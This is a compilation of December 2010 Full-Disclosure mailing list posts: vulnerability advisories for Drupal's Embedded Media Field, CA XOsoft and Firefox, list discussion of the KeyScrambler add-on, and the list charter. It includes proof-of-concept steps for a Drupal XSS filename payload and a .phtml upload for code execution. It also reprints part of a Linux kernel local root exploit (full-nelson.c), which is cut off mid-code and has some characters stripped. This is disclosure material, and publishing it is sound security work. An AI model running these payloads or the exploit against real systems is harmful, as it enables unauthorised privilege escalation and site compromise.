filenames of thumbnail images before display.
Systems affected:
- -
Drupal 6.19 with Embedded Media Field 6.x-1.25 and CCK 6.x-2.8 was
tested and shown to be vulnerable
Impact
- --
Users could inject arbitrary scripts into pages affecting other site
users. This could result in administrative account compromise leading
to web server process compromise. A more likely scenario would be for
an attacker to inject hidden content (such as iframes, applets, or
embedded objects) that would attack client browsers in an attempt to
compromise site users' machines. This vulnerability could also be used
to launch cross site request forgery (XSRF) attacks against the site
that could have other unexpected consequences.
Mitigating factors:
- ---
In order to exploit this vulnerability the attacker must have the
ability to edit content of a content type with an embedded media field.
Also, many operating systems prevent the creation of files with slashes
in their names so clever use of scripting without slashes is required to
exploit this vulnerability.
Proof of concept:
- -
1. Install Drupal 6-19, CCK module, and Embedded Media Field module
version 6.x-1.25
2. Enable the Content, Embedded Media Field, Embedded Media Thumbnail
and Embedded Video Field modules from ?q=/admin/build/modules
3. Alter the default 'Story' content type at
?q=admin/content/node-type/story/fields
4. Add a 'New Field' in the form at the bottom of this page with the
label 'video' the field name 'field_video' the type 'Embedded Video' and
the form element '3rd Party Video' then click the 'Save' button
5. Configure the new video field from
?q=admin/content/node-type/story/fields/field_video
6. Select YouTube as a content provider for convenience and be sure
'Allow custom thumbnails for this field' is checked and click 'Save
field settings' button at the bottom of the form
7. Create a new piece of story content from ?q=node/add/story entering
arbitrary values. For the 'Video custom thumbnail' choose an image with
a name like image src='no.jpg' onerror='alert(xss)'.png and click
the 'Upload' button
8. Observe the rendered javascript alert dialogue
9. Click the 'Save' button so that the XSS persists to future node edits
Patch:
- --
Applying the following patch mitigates this issue in version 6.x-1.25
- --- emfield/contrib/emthumb/emthumb.module2010-07-19 11:12:47.0
- -0400
+++ emfield/contrib/emthumb/emthumb.module 2010-11-04 16:10:48.0
- -0400
@@ -157,7 +157,7 @@ function emthumb_widget_element_process(
$element['emthumb']['description'] = array(
'#type' = 'markup',
- - '#value' = 'strong'. t('Filename:') .' /strong'.
$file['filename'],
+ '#value' = 'strong'. t('Filename:') .' /strong'.
check_plain($file['filename']),
);
// Overwrite with an input field if custom_alt is flagged.
Vendor Response
- ---
http://drupal.org/node/992924
- --
Justin Klein Keane
http://www.MadIrish.net
The digital signature on this message can be confirmed using
the public key at http://www.madirish.net/gpgkey
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/
iPwEAQECAAYFAk0BFicACgkQkSlsbLsN1gAr4wb/ZEM6I7WsGlo1Dmx58OAVl0nt
3jqcUBA6bqyZW486gyHmvavWxMofK8La1HTzmHCexspJ+M1u2oGXkp8cK6SNEiza
AIgO65vCgBsmKrfdOoy5kE9P+G+FDNOeCrHA5yEKWD1+IWzdRln+mtl0NGgSeEPn
CWkA7HW3nHlOZAVcdL5oWAYzSILD1iCh3VeVvDgtq42rUcjePwULWFgskjJ+Wcaw
q/YHEdBJO6Nd4G0I/KnYoD0HaCNcqhDcG7iaN+OXKdSNYnm5cfsCEpX4wlYpRDSV
b370KxPHrXlVrDe70iQ=
=tHrF
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Drupal Embedded Media Field Module Arbitrary File Upload and Code Exec Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Details of this disclosure can also be found at http://www.madirish.net/?article=473 Description of Vulnerability: - - Drupal (http://drupal.org) is a robust content management system (CMS) written in PHP and MySQL. The Drupal Embedded Media Field module (http://drupal.org/project/emfield) will create fields for content types that can be used to display video, image, and audio files from various third party providers Unfortunately the Embedded Media Field module contains a vulnerability that could allow arbitrary file upload and potentially code execution. The proof of concept and patch detailed below only cover the upload of an image directly to the server, but a remotely sourced image could also be used to exploit this vulnerability. Systems affected: - - Drupal 6.19 with Embedded Media Field 6.x-1.25 and CCK 6.x-2.8 was tested and shown to be vulnerable Impact - -- Malicious users can upload arbitrary files with extensions other than .php, .pl, .py, .cgi, .asp, or .js. Many web servers support legacy PHP extensions not included in this list (such as .phtml, or .php3) which would allow attackers to upload and execute arbitrary PHP code. Attackers could also upload malicious documents or other material with virus payload and use these to attack other users or exploit flaws in file include vulnerabilities. Mitigating factors: - --- In order to exploit this vulnerability the attacker must have the ability to edit or create content of a content type with an embedded media field and custom thumbnail. Proof of concept: - - 1. Install Drupal 6-19, CCK module, and Embedded Media Field module version 6.x-1.25 2. Enable the Content, Embedded Media Field, Embedded Audio Field, and Embedded Medi Thumbnail modules from ?q=/admin/build/modules 3. Alter the default 'Story' content type at ?q=admin/content/node-type/story/fields 4. Add a 'New Field' in the form at the bottom of this page with the label 'audio' the field name 'field_audio' the type 'Embedded Audio' and the form element '3rd Party Aduio' then click the 'Save' button 5. Configure the new video field from ?q=admin/content/node-type/story/fields/field_video 6. Select all content providers for convenience, ensure the 'Allow custom thumbnails for this field' checkbox is checked and click 'Save field settings' button at the bottom of the form 7. Create a new piece of story content from ?q=node/add/story entering arbitrary values. 8. Upload a test file called test.phtml as the custom image thumbnail. 9. Click the 'Upload' button 10. Although an error is displayed the file is still uploaded and available at sites/default/files/test.phtml by default Vendor Response - http://drupal.org/node/992924 - -- Justin Klein Keane http://www.MadIrish.net The digital signature on this message can be confirmed using the public key at http://www.madirish.net/gpgkey -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/ iPwEAQECAAYFAk0BFpcACgkQkSlsbLsN1gBoBwb8DN0pbNKLViCFUDL1+IA0JsjA yhkjNJjAHdlO1nrLAMWg4LOHTZwaovPZxE5TtFHA4aVwvjk7OLR50YgO8+6BwhzY zNLQbtn+GzhOEV3lddoCII281PgFHQ0gnNJhisZhUj+A2zGdw0lWtdk5xFyH53Db VfOYrBhKG4bZ61p5En8tTeBvsMBa5rS4djuehhSY5o5WacHrV1CULwxqTRMK3kXJ QLH0/ZGxoxj6tLRyUODVHHk6YAvE5jU2/B9QJKfDQEjUx7vTpIi5ot11jT+PtR/E B5UPk27cqiTamGwocWE= =2EJQ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 3.6.13 pseudo-URL SOP check bug (CVE-2010-3774)
Hi folks, Firefox 3.6.13 fixes an interesting bug in their same-origin policy logic for pseudo-URLs that do not have any inherent origin associated with them. These documents are normally expected to inherit the context from their parent, or be assigned a unique one. This didn't work as expected in Firefox, apparently due to a code refactoring in 2008. The vulnerability permits malicious websites to access and modify the contents of special pages such as about:neterror or about:config, which has consequences ranging from content spoofing to complete subversion of the browser security model. More info: http://lcamtuf.blogspot.com/2010/12/firefox-3613-damn-you-corner-cases.html Whimsical PoC: http://lcamtuf.coredump.cx/ffabout/ PS. I posted a couple of probably interesting browser security write-ups on my blog of recent, recapping the status quo in areas such as HTTP cookie security. Some readers might find them interesting / useful - say: http://lcamtuf.blogspot.com/2010/10/http-cookies-or-how-not-to-design.html Cheers, /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox Addon: KeyScrambler
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Just lightly scratching the surface, KeyScrambler.sys is signed by GlobalSign, strings reveals nothing interesting other than OpenSSL 0.9.8a is used. elazar On Thu, 09 Dec 2010 09:26:49 -0500 Gary Baribault g...@baribault.net wrote: Call me paranoid, but that sure would be a good way to spread a key logger! Gary B On 12/09/2010 07:25 AM, Christian Sciberras wrote: Dave, That's ok. Glad to have helped out :) Cheers, Chris. On Thu, Dec 9, 2010 at 1:07 PM, mrx m...@propergander.org.uk mailto:m...@propergander.org.uk wrote: On 09/12/2010 10:26, Christian Sciberras wrote: I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. Alternatively, you can just decompress the XPI (it's in fact a zip) and inspect the js files and/or decompress any binaries. I suppose they are distributing some form of driver, so you'd find IDA/ollydbg useful. Chris. I extracted the files (various .js files and an exe) from the xpi. The .js files version check and create an instance of keyscrambler.sys with the current firefox window passed to it as an argument. I also extracted the contents of the executable; setup.exe. Setup.exe contained various dll's and one sys file. I presumed this sys file; keyscrambler.sys, is the driver and main component of this addon. To confirm I monitored the running of setup.exe. My preumption was correct keyscrambler.sys is installed in system32 folder and is registered as an autostarting service, although it is hidden from the services pane in computer management. This is where my skills bottom out. ASM is something I have not yet got my head around. I have a clue, but that's about all I do have... in time ;-) Thanks for your advice and input regards Dave On Thu, Dec 9, 2010 at 11:23 AM, mrx m...@propergander.org.uk mailto:m...@propergander.org.uk wrote: On 08/12/2010 11:30, Tim Gurney wrote: Hi This seems to contradict itself somewhat. A plugin to firefox should have no way to encrypt things at a driver level within the kernel, that would require installing seperate software at the root level, a plugin should not be able to do this and i would be VERY worried and surprised if it could as it would mean bypassing the security of the OS. I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. I am not a professional, I do this kind of research as a hobby and for educational purposes, when I have some free time. Also if the driver is encrypting the key strokes and the plugin is decrypting, what about all the keystrokes that are not in firefox, like email, word processing, programming, there is nothing to decrypt these so you would end up only ever being able to use firefox on the machine and nothing else every again. The devs do state that it only encrypts keystrokes in Firefox and not other applications, although they do sell a version that supposedly works in over 160 browsers and applications. personally I would not touch this with a barge pole and I would do a lot more more digging and checking into this. Yes, I am sceptical of claims, hence the post to this list. regards Tim Thanks for your input Dave. On 08/12/10 11:12, mrx wrote: Hi list, Is anyone familiar with the firefox addon KeyScrambler? According to developers this encrypts keystrokes. Quote: How KeyScrambler Works: When you type on your keyboard, the keys travel along a path within the operating system before it arrives at your browser. Keyloggers plant themselves along this path and observe and record your keystrokes. The collected information is then sent to the criminals who will use it to steal from you. KeyScrambler defeats keyloggers by encrypting your keystrokes at the keyboard driver level, deep within the operating system. When the encrypted keystrokes reach your browser, KeyScrambler then decrypts them so you see exactly the keys you've typed. Keyloggers can only record the encrypted keys, which are completely indecipherable. Can this be trusted? As in trusted I mean not bypassed. Input from the professionals on this list would be much appreciated. Thank you regards Dave ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html
[Full-disclosure] ZDI-10-263: CA Multiple Products create_session_bab SOAP Request Remote Code Execution Vulnerability
ZDI-10-263: CA Multiple Products create_session_bab SOAP Request Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-263 December 9, 2010 -- CVE ID: CVE-2010-3984 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: CA -- Affected Products: CA XOsoft High Availability CA XOsoft Replication CA XOsoft Content Distribution CA ARCserve Replication and High Availability -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10708. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of CA ARCserve Replication and High Availability. Authentication is not required to exploit this vulnerability. The specific flaw exists within the create_session_bab SOAP operation, which is handled by the xosoapapi.asmx process that is crucial to the remote administration of both the High Availability and the Replication products. By sending a specially crafted POST request to the xosoapapi.asmx process a remote, unauthenticated attacker can trigger a buffer overflow condition that results in arbitrary code execution under the context of the SOAP server process. -- Vendor Response: CA states: CA20101209-01: Security Notice for CA XOsoft https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7bF EB41CE8-5023-46DF-B257-5299F492BF23%7d -- Disclosure Timeline: 2010-08-12 - Vulnerability reported to vendor 2010-12-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * AbdulAziz Hariri -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CA20101209-01: Security Notice for CA XOsoft
-BEGIN PGP SIGNED MESSAGE- CA20101209-01: Security Notice for CA XOsoft Issued: December 9, 2010 CA Technologies support is alerting customers to a security risk with CA XOsoft. A vulnerability exists that can allow a remote attacker to execute arbitrary code. CA has issued a patch to address the vulnerability for each affected release. The vulnerability, CVE-2010-3984, is due to insufficient bounds checking with a SOAP request. A remote attacker can make a SOAP request to cause a buffer overflow and potentially compromise the system. Risk Rating High Platform Windows Affected Products CA XOsoft Replication r12.0 sp1 CA XOsoft High Availability r12.0 sp1 CA XOsoft Content Distribution r12.0 sp1 CA XOsoft Replication r12.5 sp2 rollup CA XOsoft High Availability r12.5 sp2 rollup CA XOsoft Content Distribution r12.5 sp2 rollup CA ARCserve Replication and High Availability r15.0 sp1 Non-Affected Products CA ARCserve Replication and High Availability r15.2 How to determine if the installation is affected 1. Using Windows Explorer, locate the file mng_core_com.dll. By default in r12.0 and r12.5, the file is located in the C:\Program Files\CA\XOsoft\Manager directory. For r15.0 sp1, the file is located in the C:\Program Files\CA\ARCserve RHA\Manager directory. 2. Right click on the file and select Properties. 3. Select the General tab. 4. If the file timestamp is earlier than indicated in the below table, the installation is vulnerable. Product File Name Timestamp File Size XOsoft 12.0 sp1 mng_core_com.dll 10/09/2010 2,007,040 bytes XOsoft 12.5 sp2 rollup mng_core_com.dll 10/13/2010 2,396,160 bytes ARCserve RHA 15.0 sp1 mng_core_com.dll 10/13/2010 2,990,080 bytes Solution CA issued the following patch to address the vulnerability. CA ARCserve Replication and High Availability r15.0 sp1: RO24455 CA XOsoft Replication r12.5 sp2 rollup, CA XOsoft High Availability r12.5 sp2 rollup, CA XOsoft Content Distribution r12.5 sp2 rollup: RO24313 CA XOsoft Replication r12.0 sp1, CA XOsoft High Availability r12.0 sp1, CA XOsoft Content Distribution r12.0 sp1: RO24314 References CVE-2010-3984 - XOsoft buffer overflow CA20101209-01: Security Notice for CA XOsoft (line wraps) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7 bFEB41CE8-5023-46DF-B257-5299F492BF23%7d Acknowledgement CVE-2010-3984 - AbdulAziz Hariri through the TippingPoint ZDI program Change History Version 1.0: Initial Release If additional information is required, please contact CA Technologies Support at http://support.ca.com/. If you discover a vulnerability in a CA Technologies product, please report your findings to the CA Technologies Product Vulnerability Response Team. http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx Kevin Kotas CA Technologies Product Vulnerability Response Team -BEGIN PGP SIGNATURE- Version: PGP 8.1 iQEVAwUBTQEo4pI1FvIeMomJAQFI3gf+PpMhF3fHNJq2Fk/7eYyxFdiG3OC6fHBR BU2b/bkZyI4xG31tQrPTqXt7+ne7a9sTLeH34QPfqur7nV3bVzqgCk891KWEgp98 J42wQYC35w5JVwibVxh82qggd5Cjpd4xNmpE7f+8Rg+dv5K+8xsBU+lTKWd5DusF H5z87Ux7BS1kDKg4W51XIJk1i81iSKWcTaDxx/ztRKCpyKHgLgpy6pLavOi5LzMH 5yqvSwtM2gYQ+8ciBGCnYDWY+TOSHGAGMpE0ZBpyY7K9CodlJEgV7oiD7VVb3x92 wgnBQHrUm5tACtsMMtMYjnd0H0x00u1BOy+smP6B+QsnnLXy/i7eUg== =YEMX -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox Addon: KeyScrambler
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 09/12/2010 19:33, Elazar Broad wrote: Just lightly scratching the surface, KeyScrambler.sys is signed by GlobalSign, strings reveals nothing interesting other than OpenSSL 0.9.8a is used. elazar Yes I noticed the RSA source code references in the disassembly. Now I am curious if this implementation of OpenSSL is vulnerable to the various CVE's that have been issued against 0.9.8a. CVE 2007-4995:Off-by one error in DTLS vulnerability CVE 2007-5135:One byte buffer overflow in the SSL_get_shared_ciphers function CVE 2007-3108:BN_from_montgomery side-channel attack. And how it could be exploited if this is the case. I am not skilled enough to know. However, if I was developing this software I would update it. Cheers Dave On Thu, 09 Dec 2010 09:26:49 -0500 Gary Baribault g...@baribault.net wrote: Call me paranoid, but that sure would be a good way to spread a key logger! Gary B On 12/09/2010 07:25 AM, Christian Sciberras wrote: Dave, That's ok. Glad to have helped out :) Cheers, Chris. On Thu, Dec 9, 2010 at 1:07 PM, mrx m...@propergander.org.uk mailto:m...@propergander.org.uk wrote: On 09/12/2010 10:26, Christian Sciberras wrote: I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. Alternatively, you can just decompress the XPI (it's in fact a zip) and inspect the js files and/or decompress any binaries. I suppose they are distributing some form of driver, so you'd find IDA/ollydbg useful. Chris. I extracted the files (various .js files and an exe) from the xpi. The .js files version check and create an instance of keyscrambler.sys with the current firefox window passed to it as an argument. I also extracted the contents of the executable; setup.exe. Setup.exe contained various dll's and one sys file. I presumed this sys file; keyscrambler.sys, is the driver and main component of this addon. To confirm I monitored the running of setup.exe. My preumption was correct keyscrambler.sys is installed in system32 folder and is registered as an autostarting service, although it is hidden from the services pane in computer management. This is where my skills bottom out. ASM is something I have not yet got my head around. I have a clue, but that's about all I do have... in time ;-) Thanks for your advice and input regards Dave On Thu, Dec 9, 2010 at 11:23 AM, mrx m...@propergander.org.uk mailto:m...@propergander.org.uk wrote: On 08/12/2010 11:30, Tim Gurney wrote: Hi This seems to contradict itself somewhat. A plugin to firefox should have no way to encrypt things at a driver level within the kernel, that would require installing seperate software at the root level, a plugin should not be able to do this and i would be VERY worried and surprised if it could as it would mean bypassing the security of the OS. I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) environment and it is incompatible. I may wait for an update to the plugin and analyse its behaviour, providing my curiosity doesn't wane in the meantime. I am not a professional, I do this kind of research as a hobby and for educational purposes, when I have some free time. Also if the driver is encrypting the key strokes and the plugin is decrypting, what about all the keystrokes that are not in firefox, like email, word processing, programming, there is nothing to decrypt these so you would end up only ever being able to use firefox on the machine and nothing else every again. The devs do state that it only encrypts keystrokes in Firefox and not other applications, although they do sell a version that supposedly works in over 160 browsers and applications. personally I would not touch this with a barge pole and I would do a lot more more digging and checking into this. Yes, I am sceptical of claims, hence the post to this list. regards Tim Thanks for your input Dave. On 08/12/10 11:12, mrx wrote: Hi list, Is anyone familiar with the firefox addon KeyScrambler? According to developers this encrypts keystrokes. Quote: How KeyScrambler Works: When you type on your keyboard, the keys travel along a path within the operating system before it arrives at your browser. Keyloggers plant themselves along this path and observe and record your keystrokes. The collected information is then sent to the criminals who will use it to steal from you. KeyScrambler defeats keyloggers by encrypting your keystrokes at the keyboard driver level, deep within the operating system. When the encrypted keystrokes reach your browser, KeyScrambler then decrypts them so you see exactly the keys you've typed. Keyloggers can only record the encrypted keys,
[Full-disclosure] Linux Kernel Bug Fixed For OpenBSD
Hello full disclosure!!! I is like to warn you about Linux kernel exploit that is was warned you by to from Dan Rosenberg. Is I discover that Linux OpenBSD is no vulnerable bash-4.0$ id uid=1001(musntlive) gid=1001(musntlive) groups=1001(musntlive) bash-4.0$ uname -ap OpenBSD im.is.hakaruski.websecurity.ug.ly 4.7 HAKARUSKI i386 AMD Phenom(tm) 9850 Quad-Core Processor (AuthenticAMD 686-class, 512KB L2 cache) bash-4.0$ ls fullnelson.c IsAllSecurityIsResearch IsThisBeIsGoatPorn IsLearnHowIsToTalk bash-4.0$ gcc -o peggy fullnelson.c fullnelson.c: In function `main': fullnelson.c:216: error: `PF_ECONET' undeclared (first use in this function) fullnelson.c:216: error: (Each undeclared identifier is reported only once fullnelson.c:216: error: for each function it appears in.) fullnelson.c:249: error: `MAP_ANONYMOUS' undeclared (first use in this function) fullnelson.c:260: error: `CLONE_VM' undeclared (first use in this function) fullnelson.c:260: error: `CLONE_CHILD_CLEARTID' undeclared (first use in this function) bash-4.0$ However is how we fix to make work on Linux OpenBSD: bash-4.0$ su # id uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) # finger musntlive Login: musntliveName: musntlive Directory: /home/this-is-be-home-for/musntlive Shell: /usr/local/c0t0d0s0/bin/bash Never logged in. No Mail. No Plan. No Engrish. # http://www.youtube.com/watch?v=GRLwKw9up3s ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel exploit
$ ./nelson [*] Failed to open file descriptors. $ uname -r 2.6.35.6-48.fc14.x86_64 $ cat /etc/redhat-release Fedora release 14 (Laughlin) But I updated a couple of days ago. -- Best regards, Vadim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel exploit
Hi Dan,
Tested on:
kernel 2.6.32 (Ubuntu 10.04) worked.
kernel 2.6.28 didn’t work. (Failed to open file descriptors)
Nice work, Dan.
Regards,
Sherif
On Tue, Dec 7, 2010 at 10:25 PM, Dan Rosenberg dan.j.rosenb...@gmail.comwrote:
Hi all,
I've included here a proof-of-concept local privilege escalation exploit
for Linux. Please read the header for an explanation of what's going
on. Without further ado, I present full-nelson.c:
Happy hacking,
Dan
--snip--
/*
* Linux Kernel = 2.6.37 local privilege escalation
* by Dan Rosenberg
* @djrbliss on twitter
*
* Usage:
* gcc full-nelson.c -o full-nelson
* ./full-nelson
*
* This exploit leverages three vulnerabilities to get root, all of which
were
* discovered by Nelson Elhage:
*
* CVE-2010-4258
* -
* This is the interesting one, and the reason I wrote this exploit. If a
* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a
NULL
* word will be written to a user-specified pointer when that thread exits.
* This write is done using put_user(), which ensures the provided
destination
* resides in valid userspace by invoking access_ok(). However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page
fault,
* etc.), this override is not reverted before calling put_user() in the
exit
* path, allowing a user to write a NULL word to an arbitrary kernel
address.
* Note that this issue requires an additional vulnerability to trigger.
*
* CVE-2010-3849
* -
* This is a NULL pointer dereference in the Econet protocol. By itself,
it's
* fairly benign as a local denial-of-service. It's a perfect candidate to
* trigger the above issue, since it's reachable via sock_no_sendpage(),
which
* subsequently calls sendmsg under KERNEL_DS.
*
* CVE-2010-3850
* -
* I wouldn't be able to reach the NULL pointer dereference and trigger the
* OOPS if users weren't able to assign Econet addresses to arbitrary
* interfaces due to a missing capabilities check.
*
* In the interest of public safety, this exploit was specifically designed
to
* be limited:
*
* * The particular symbols I resolve are not exported on Slackware or
Debian
* * Red Hat does not support Econet by default
* * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
*Debian
*
* However, the important issue, CVE-2010-4258, affects everyone, and it
would
* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
* more sophisticated version of this that doesn't have the roadblocks I
put in
* to prevent abuse by script kiddies.
*
* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
*
* NOTE: the exploit process will deadlock and stay in a zombie state after
you
* exit your root shell because the Econet thread OOPSes while holding the
* Econet mutex. It wouldn't be too hard to fix this up, but I didn't
bother.
*
* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
*/
#include stdio.h
#include sys/socket.h
#include fcntl.h
#include sys/ioctl.h
#include string.h
#include net/if.h
#include sched.h
#include stdlib.h
#include signal.h
#include sys/utsname.h
#include sys/mman.h
#include unistd.h
/* How many bytes should we clear in our
* function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif
/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;
f = fopen(/proc/kallsyms, r);
if (f == NULL) {
f = fopen(/proc/ksyms, r);
if (f == NULL)
goto fallback;
oldstyle = 1;
}
repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, %p %c %s\n, (void **)addr,
dummy, sname);
else {
ret = fscanf(f, %p %s\n, (void **)addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, _O/) || strstr(sname,
_S.))
continue;
p = strrchr(sname, '_');
if (p ((char *)sname + 5) !strncmp(p -
3, smp, 3)) {
p = p - 4;
while (p (char *)sname *(p - 1)
== '_')
p--;
*p = '\0';
}
}
}
Re: [Full-disclosure] MD5 decrypter PHP Script
I did a quite similar script for oscommerce, more in a rainbowtables building way. $password = md5($salt . $plain) . ':' . $salt; http://pastebin.com/mtciPcTM Regards /JA http://www.linkedin.com/in/jeromeathias The computer security is an art form. It's the ultimate martial art. smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux kernel exploit
a few test [...@yangtao ~]$ ./extest ./extest: error while loading shared libraries: requires glibc 2.5 or later dynamic linker [...@yangtao ~]$ uname -r 2.6.9-89.0.25.ELsmp [...@yangtao ~]$ cat /etc/redhat-release CentOS release 4.8 (Final) == [...@kernel ~]$ ./extest [*] Failed to open file descriptors. [...@kernel ~]$ uname -r 2.6.35.4 [...@kernel ~]$ cat /etc/redhat-release CentOS release 5.2 (Final) == [...@kernel64 ~]$ ./extest [*] Failed to open file descriptors. [...@kernel64 ~]$ uname -r 2.6.33.1 [...@kernel64 ~]$ cat /etc/redhat-release CentOS release 5.5 (Final) On 12/8/2010 4:42 PM, Vadim Grinco wrote: $ ./nelson [*] Failed to open file descriptors. $ uname -r 2.6.35.6-48.fc14.x86_64 $ cat /etc/redhat-release Fedora release 14 (Laughlin) But I updated a couple of days ago. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright jo...@grok.org.uk - Introduction Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclos...@lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a consensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-265: Mozilla Firefox NewIdArray Integer Overflow Remote Code Execution Vulnerability
